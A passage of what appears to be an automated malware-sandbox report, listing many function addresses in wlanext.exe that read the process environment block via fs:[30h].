          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EAA16 mov eax, dword ptr fs:[00000030h]19_2_034EAA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E5210 mov eax, dword ptr fs:[00000030h]19_2_034E5210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E5210 mov ecx, dword ptr fs:[00000030h]19_2_034E5210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E5210 mov eax, dword ptr fs:[00000030h]19_2_034E5210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E5210 mov eax, dword ptr fs:[00000030h]19_2_034E5210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350A229 mov eax, dword ptr fs:[00000030h]19_2_0350A229
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350A229 mov eax, dword ptr fs:[00000030h]19_2_0350A229
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350A229 mov eax, dword ptr fs:[00000030h]19_2_0350A229
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350A229 mov eax, dword ptr fs:[00000030h]19_2_0350A229
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350A229 mov eax, dword ptr fs:[00000030h]19_2_0350A229
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350A229 mov eax, dword ptr fs:[00000030h]19_2_0350A229
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350A229 mov eax, dword ptr fs:[00000030h]19_2_0350A229
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350A229 mov eax, dword ptr fs:[00000030h]19_2_0350A229
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350A229 mov eax, dword ptr fs:[00000030h]19_2_0350A229
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03524A2C mov eax, dword ptr fs:[00000030h]19_2_03524A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03524A2C mov eax, dword ptr fs:[00000030h]19_2_03524A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03512ACB mov eax, dword ptr fs:[00000030h]19_2_03512ACB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03512AE4 mov eax, dword ptr fs:[00000030h]19_2_03512AE4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351D294 mov eax, dword ptr fs:[00000030h]19_2_0351D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351D294 mov eax, dword ptr fs:[00000030h]19_2_0351D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351FAB0 mov eax, dword ptr fs:[00000030h]19_2_0351FAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E52A5 mov eax, dword ptr fs:[00000030h]19_2_034E52A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E52A5 mov eax, dword ptr fs:[00000030h]19_2_034E52A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E52A5 mov eax, dword ptr fs:[00000030h]19_2_034E52A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E52A5 mov eax, dword ptr fs:[00000030h]19_2_034E52A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E52A5 mov eax, dword ptr fs:[00000030h]19_2_034E52A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FAAB0 mov eax, dword ptr fs:[00000030h]19_2_034FAAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FAAB0 mov eax, dword ptr fs:[00000030h]19_2_034FAAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350B944 mov eax, dword ptr fs:[00000030h]19_2_0350B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350B944 mov eax, dword ptr fs:[00000030h]19_2_0350B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EC962 mov eax, dword ptr fs:[00000030h]19_2_034EC962
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EB171 mov eax, dword ptr fs:[00000030h]19_2_034EB171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EB171 mov eax, dword ptr fs:[00000030h]19_2_034EB171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E9100 mov eax, dword ptr fs:[00000030h]19_2_034E9100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E9100 mov eax, dword ptr fs:[00000030h]19_2_034E9100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E9100 mov eax, dword ptr fs:[00000030h]19_2_034E9100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351513A mov eax, dword ptr fs:[00000030h]19_2_0351513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351513A mov eax, dword ptr fs:[00000030h]19_2_0351513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03504120 mov eax, dword ptr fs:[00000030h]19_2_03504120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03504120 mov eax, dword ptr fs:[00000030h]19_2_03504120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03504120 mov eax, dword ptr fs:[00000030h]19_2_03504120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03504120 mov eax, dword ptr fs:[00000030h]19_2_03504120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03504120 mov ecx, dword ptr fs:[00000030h]19_2_03504120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EB1E1 mov eax, dword ptr fs:[00000030h]19_2_034EB1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EB1E1 mov eax, dword ptr fs:[00000030h]19_2_034EB1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EB1E1 mov eax, dword ptr fs:[00000030h]19_2_034EB1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035741E8 mov eax, dword ptr fs:[00000030h]19_2_035741E8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03512990 mov eax, dword ptr fs:[00000030h]19_2_03512990
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350C182 mov eax, dword ptr fs:[00000030h]19_2_0350C182
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351A185 mov eax, dword ptr fs:[00000030h]19_2_0351A185
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035651BE mov eax, dword ptr fs:[00000030h]19_2_035651BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035651BE mov eax, dword ptr fs:[00000030h]19_2_035651BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035651BE mov eax, dword ptr fs:[00000030h]19_2_035651BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035651BE mov eax, dword ptr fs:[00000030h]19_2_035651BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035669A6 mov eax, dword ptr fs:[00000030h]19_2_035669A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035161A0 mov eax, dword ptr fs:[00000030h]19_2_035161A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035161A0 mov eax, dword ptr fs:[00000030h]19_2_035161A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A49A4 mov eax, dword ptr fs:[00000030h]19_2_035A49A4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A49A4 mov eax, dword ptr fs:[00000030h]19_2_035A49A4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A49A4 mov eax, dword ptr fs:[00000030h]19_2_035A49A4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A49A4 mov eax, dword ptr fs:[00000030h]19_2_035A49A4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03500050 mov eax, dword ptr fs:[00000030h]19_2_03500050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03500050 mov eax, dword ptr fs:[00000030h]19_2_03500050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A2073 mov eax, dword ptr fs:[00000030h]19_2_035A2073
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B1074 mov eax, dword ptr fs:[00000030h]19_2_035B1074
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03567016 mov eax, dword ptr fs:[00000030h]19_2_03567016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03567016 mov eax, dword ptr fs:[00000030h]19_2_03567016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03567016 mov eax, dword ptr fs:[00000030h]19_2_03567016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B4015 mov eax, dword ptr fs:[00000030h]19_2_035B4015
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B4015 mov eax, dword ptr fs:[00000030h]19_2_035B4015
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FB02A mov eax, dword ptr fs:[00000030h]19_2_034FB02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FB02A mov eax, dword ptr fs:[00000030h]19_2_034FB02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FB02A mov eax, dword ptr fs:[00000030h]19_2_034FB02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FB02A mov eax, dword ptr fs:[00000030h]19_2_034FB02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351002D mov eax, dword ptr fs:[00000030h]19_2_0351002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351002D mov eax, dword ptr fs:[00000030h]19_2_0351002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351002D mov eax, dword ptr fs:[00000030h]19_2_0351002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351002D mov eax, dword ptr fs:[00000030h]19_2_0351002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351002D mov eax, dword ptr fs:[00000030h]19_2_0351002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357B8D0 mov eax, dword ptr fs:[00000030h]19_2_0357B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357B8D0 mov ecx, dword ptr fs:[00000030h]19_2_0357B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357B8D0 mov eax, dword ptr fs:[00000030h]19_2_0357B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357B8D0 mov eax, dword ptr fs:[00000030h]19_2_0357B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357B8D0 mov eax, dword ptr fs:[00000030h]19_2_0357B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357B8D0 mov eax, dword ptr fs:[00000030h]19_2_0357B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E58EC mov eax, dword ptr fs:[00000030h]19_2_034E58EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E40E1 mov eax, dword ptr fs:[00000030h]19_2_034E40E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E40E1 mov eax, dword ptr fs:[00000030h]19_2_034E40E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E40E1 mov eax, dword ptr fs:[00000030h]19_2_034E40E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E9080 mov eax, dword ptr fs:[00000030h]19_2_034E9080
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03563884 mov eax, dword ptr fs:[00000030h]19_2_03563884
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03563884 mov eax, dword ptr fs:[00000030h]19_2_03563884
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351F0BF mov ecx, dword ptr fs:[00000030h]19_2_0351F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351F0BF mov eax, dword ptr fs:[00000030h]19_2_0351F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351F0BF mov eax, dword ptr fs:[00000030h]19_2_0351F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035120A0 mov eax, dword ptr fs:[00000030h]19_2_035120A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035120A0 mov eax, dword ptr fs:[00000030h]19_2_035120A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035120A0 mov eax, dword ptr fs:[00000030h]19_2_035120A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035120A0 mov eax, dword ptr fs:[00000030h]19_2_035120A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035120A0 mov eax, dword ptr fs:[00000030h]19_2_035120A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035120A0 mov eax, dword ptr fs:[00000030h]19_2_035120A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035290AF mov eax, dword ptr fs:[00000030h]19_2_035290AF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FEF40 mov eax, dword ptr fs:[00000030h]19_2_034FEF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FFF60 mov eax, dword ptr fs:[00000030h]19_2_034FFF60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B8F6A mov eax, dword ptr fs:[00000030h]19_2_035B8F6A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350F716 mov eax, dword ptr fs:[00000030h]19_2_0350F716
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357FF10 mov eax, dword ptr fs:[00000030h]19_2_0357FF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357FF10 mov eax, dword ptr fs:[00000030h]19_2_0357FF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B070D mov eax, dword ptr fs:[00000030h]19_2_035B070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B070D mov eax, dword ptr fs:[00000030h]19_2_035B070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351A70E mov eax, dword ptr fs:[00000030h]19_2_0351A70E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351A70E mov eax, dword ptr fs:[00000030h]19_2_0351A70E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E4F2E mov eax, dword ptr fs:[00000030h]19_2_034E4F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E4F2E mov eax, dword ptr fs:[00000030h]19_2_034E4F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351E730 mov eax, dword ptr fs:[00000030h]19_2_0351E730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035237F5 mov eax, dword ptr fs:[00000030h]19_2_035237F5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03567794 mov eax, dword ptr fs:[00000030h]19_2_03567794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03567794 mov eax, dword ptr fs:[00000030h]19_2_03567794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03567794 mov eax, dword ptr fs:[00000030h]19_2_03567794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F8794 mov eax, dword ptr fs:[00000030h]19_2_034F8794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F7E41 mov eax, dword ptr fs:[00000030h]19_2_034F7E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F7E41 mov eax, dword ptr fs:[00000030h]19_2_034F7E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F7E41 mov eax, dword ptr fs:[00000030h]19_2_034F7E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F7E41 mov eax, dword ptr fs:[00000030h]19_2_034F7E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F7E41 mov eax, dword ptr fs:[00000030h]19_2_034F7E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F7E41 mov eax, dword ptr fs:[00000030h]19_2_034F7E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AAE44 mov eax, dword ptr fs:[00000030h]19_2_035AAE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AAE44 mov eax, dword ptr fs:[00000030h]19_2_035AAE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F766D mov eax, dword ptr fs:[00000030h]19_2_034F766D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350AE73 mov eax, dword ptr fs:[00000030h]19_2_0350AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350AE73 mov eax, dword ptr fs:[00000030h]19_2_0350AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350AE73 mov eax, dword ptr fs:[00000030h]19_2_0350AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350AE73 mov eax, dword ptr fs:[00000030h]19_2_0350AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350AE73 mov eax, dword ptr fs:[00000030h]19_2_0350AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351A61C mov eax, dword ptr fs:[00000030h]19_2_0351A61C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351A61C mov eax, dword ptr fs:[00000030h]19_2_0351A61C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EC600 mov eax, dword ptr fs:[00000030h]19_2_034EC600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EC600 mov eax, dword ptr fs:[00000030h]19_2_034EC600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EC600 mov eax, dword ptr fs:[00000030h]19_2_034EC600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03518E00 mov eax, dword ptr fs:[00000030h]19_2_03518E00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1608 mov eax, dword ptr fs:[00000030h]19_2_035A1608
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0359FE3F mov eax, dword ptr fs:[00000030h]19_2_0359FE3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EE620 mov eax, dword ptr fs:[00000030h]19_2_034EE620
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B8ED6 mov eax, dword ptr fs:[00000030h]19_2_035B8ED6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03528EC7 mov eax, dword ptr fs:[00000030h]19_2_03528EC7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0359FEC0 mov eax, dword ptr fs:[00000030h]19_2_0359FEC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035136CC mov eax, dword ptr fs:[00000030h]19_2_035136CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F76E2 mov eax, dword ptr fs:[00000030h]19_2_034F76E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035116E0 mov ecx, dword ptr fs:[00000030h]19_2_035116E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357FE87 mov eax, dword ptr fs:[00000030h]19_2_0357FE87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035646A7 mov eax, dword ptr fs:[00000030h]19_2_035646A7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B0EA5 mov eax, dword ptr fs:[00000030h]19_2_035B0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B0EA5 mov eax, dword ptr fs:[00000030h]19_2_035B0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B0EA5 mov eax, dword ptr fs:[00000030h]19_2_035B0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03507D50 mov eax, dword ptr fs:[00000030h]19_2_03507D50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03523D43 mov eax, dword ptr fs:[00000030h]19_2_03523D43
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03563540 mov eax, dword ptr fs:[00000030h]19_2_03563540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03593D40 mov eax, dword ptr fs:[00000030h]19_2_03593D40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350C577 mov eax, dword ptr fs:[00000030h]19_2_0350C577
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350C577 mov eax, dword ptr fs:[00000030h]19_2_0350C577
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0356A537 mov eax, dword ptr fs:[00000030h]19_2_0356A537
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AE539 mov eax, dword ptr fs:[00000030h]19_2_035AE539
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03514D3B mov eax, dword ptr fs:[00000030h]19_2_03514D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03514D3B mov eax, dword ptr fs:[00000030h]19_2_03514D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03514D3B mov eax, dword ptr fs:[00000030h]19_2_03514D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B8D34 mov eax, dword ptr fs:[00000030h]19_2_035B8D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F3D34 mov eax, dword ptr fs:[00000030h]19_2_034F3D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EAD30 mov eax, dword ptr fs:[00000030h]19_2_034EAD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566DC9 mov eax, dword ptr fs:[00000030h]19_2_03566DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566DC9 mov eax, dword ptr fs:[00000030h]19_2_03566DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566DC9 mov eax, dword ptr fs:[00000030h]19_2_03566DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566DC9 mov ecx, dword ptr fs:[00000030h]19_2_03566DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566DC9 mov eax, dword ptr fs:[00000030h]19_2_03566DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566DC9 mov eax, dword ptr fs:[00000030h]19_2_03566DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03598DF1 mov eax, dword ptr fs:[00000030h]19_2_03598DF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FD5E0 mov eax, dword ptr fs:[00000030h]19_2_034FD5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FD5E0 mov eax, dword ptr fs:[00000030h]19_2_034FD5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AFDE2 mov eax, dword ptr fs:[00000030h]19_2_035AFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AFDE2 mov eax, dword ptr fs:[00000030h]19_2_035AFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AFDE2 mov eax, dword ptr fs:[00000030h]19_2_035AFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AFDE2 mov eax, dword ptr fs:[00000030h]19_2_035AFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E2D8A mov eax, dword ptr fs:[00000030h]19_2_034E2D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E2D8A mov eax, dword ptr fs:[00000030h]19_2_034E2D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E2D8A mov eax, dword ptr fs:[00000030h]19_2_034E2D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E2D8A mov eax, dword ptr fs:[00000030h]19_2_034E2D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E2D8A mov eax, dword ptr fs:[00000030h]19_2_034E2D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351FD9B mov eax, dword ptr fs:[00000030h]19_2_0351FD9B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351FD9B mov eax, dword ptr fs:[00000030h]19_2_0351FD9B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03512581 mov eax, dword ptr fs:[00000030h]19_2_03512581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03512581 mov eax, dword ptr fs:[00000030h]19_2_03512581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03512581 mov eax, dword ptr fs:[00000030h]19_2_03512581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03512581 mov eax, dword ptr fs:[00000030h]19_2_03512581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03511DB5 mov eax, dword ptr fs:[00000030h]19_2_03511DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03511DB5 mov eax, dword ptr fs:[00000030h]19_2_03511DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03511DB5 mov eax, dword ptr fs:[00000030h]19_2_03511DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035135A1 mov eax, dword ptr fs:[00000030h]19_2_035135A1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B05AC mov eax, dword ptr fs:[00000030h]19_2_035B05AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B05AC mov eax, dword ptr fs:[00000030h]19_2_035B05AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357C450 mov eax, dword ptr fs:[00000030h]19_2_0357C450
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0357C450 mov eax, dword ptr fs:[00000030h]19_2_0357C450
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351A44B mov eax, dword ptr fs:[00000030h]19_2_0351A44B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350746D mov eax, dword ptr fs:[00000030h]19_2_0350746D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B740D mov eax, dword ptr fs:[00000030h]19_2_035B740D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B740D mov eax, dword ptr fs:[00000030h]19_2_035B740D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B740D mov eax, dword ptr fs:[00000030h]19_2_035B740D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
